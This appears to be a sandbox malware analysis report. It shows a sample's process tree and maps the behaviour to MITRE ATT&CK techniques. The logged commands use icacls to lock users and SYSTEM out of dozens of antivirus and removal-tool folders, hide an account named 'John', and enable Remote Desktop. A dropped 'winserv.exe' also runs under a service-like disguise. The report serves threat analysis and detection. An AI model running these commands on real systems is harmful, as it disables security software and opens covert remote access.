C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3092

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5024

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:2724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2844

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
5⤵
PID:3364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1072

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2176

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
5⤵
PID:1232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
4⤵
PID:780

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
4⤵
PID:3308

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
5⤵
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3864

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
PID:4488

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
5⤵
PID:4968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2884

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
4⤵
PID:1508

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3664

C:\Windows\system32\icacls.exe
icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
4⤵
PID:572

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4356

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4836

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3504

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
5⤵
PID:3128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
4⤵
PID:4036

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
5⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
4⤵
PID:1632

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
5⤵
PID:2104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
4⤵
PID:4136

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
5⤵
PID:1028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
4⤵
PID:760

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
PID:4320

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1440

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
PID:3428

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:2252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1376

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
4⤵
PID:1580

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
5⤵
PID:1096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3980

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
4⤵
PID:1188

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1300

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
4⤵
PID:3888

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1232

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
5⤵
PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
4⤵
PID:1676

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2116

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1380

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
4⤵
PID:392

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2168

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4768

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
5⤵
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4416

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3924

C:\Windows\system32\icacls.exe
icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4000

C:\Windows\system32\icacls.exe
icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3760

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4848

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4992

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
4⤵
PID:4684

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
5⤵
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1212

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
4⤵
PID:3116

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3588

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:2580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
4⤵
PID:2832

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3636

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
4⤵
PID:1280

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
5⤵
PID:4704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3364

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
4⤵
PID:4208

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1488

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
4⤵
PID:2488

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1876

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
5⤵
PID:684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
4⤵
PID:1528

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2808

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
4⤵
PID:4968

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
5⤵
PID:4656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4328

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
4⤵
PID:2216

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2640

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
4⤵
PID:1084

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4016

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
5⤵
PID:1328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1596

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4952

C:\Windows\system32\icacls.exe
icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3296

C:\Windows\system32\icacls.exe
icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:2492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2968

C:\Windows\system32\icacls.exe
icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
5⤵
PID:456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
4⤵
PID:556

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
5⤵
PID:1212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2236

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3428

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
4⤵
PID:964

C:\Windows\system32\icacls.exe
icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4788

C:\Windows\system32\icacls.exe
icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1388

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1392

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2224

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1724

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1636

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:1332

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3932

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Virtualization/Sandbox Evasion

T1497

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery